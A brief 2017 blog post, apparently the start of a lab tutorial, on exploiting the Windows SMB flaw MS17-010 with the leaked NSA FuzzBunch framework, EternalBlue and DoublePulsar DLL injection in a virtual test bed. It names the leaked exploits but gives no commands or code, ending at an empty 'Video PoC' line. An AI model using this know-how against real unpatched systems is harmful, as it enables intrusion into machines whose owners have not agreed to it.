Monday, 1 May 2017

Exploiting MS17-010 using FuzzBunch and Metasploit

FuzzBunch is a exploit framework like Metasploit, which was released in the recent NSA data leak by ShadowBrokers.

The leaked data can be found here.

The framework included following exploits:

1) EternalBlue - MS17-010
2) EternalSynergy - MS17-010
3) EternalRomance - MS17-010
4) EternalChampion - MS17-010
5) EmeraldThread - MS10-061
6) EskimoRoll - MS14-068
7) EducatedScholar - MS09-050
8) EclipsedWing - MS08-067

Here we will be using EternalBlue with DoublePulsar, DoublePlusar is used for DLL injection.

A virtual test bed was created for this activity. Virtual envirnment involved the following:
1) Windows XP x86 - installed with Python 2.6, Pywin32 and FuzzBunch repository
2) Windows Server 2k8 R2 SP1

Video PoC: